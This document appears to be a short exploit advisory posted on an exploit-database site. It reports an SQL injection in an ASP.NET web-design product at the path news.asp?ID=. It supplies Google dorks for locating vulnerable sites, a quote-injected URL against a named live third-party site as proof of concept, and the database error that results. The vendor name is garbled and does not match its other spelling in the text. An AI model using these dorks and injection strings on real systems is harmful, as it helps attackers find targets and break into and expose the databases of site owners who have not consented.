############################################ # Exploit Title : BuAdegnteractive Web Design 1.0 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Date : 30/12/2018 # Vendor Homepage : buinteractive.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Version Information : 1.0 - Microsoft ASP.NET - IIS 6.0 + Windows Server Operating System # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060020 ############################################ BuAdegnteractive Web Design E-Commerce Social Media Digital Marketing SQL Injection Vulnerability ############################################ # Google Dork : intext:''Bu interactive'' # Google Dork : inurl:''/news.asp?ID='' site:oymaksan.com.tr # Exploit : /news.asp?ID=[SQL Injection] ############################################ # Example Site => oymaksan.com.tr/news.asp?ID=25%27 => [ Proof of Concept for SQL Inj ] => archive.is/1X8m5 ############################################ # SQL-DB Error => ADODB.Command error '800a0d5d' Application uses a value of the wrong type for the current operation. /includes/inc_main.asp, line 1683 ############################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ############################################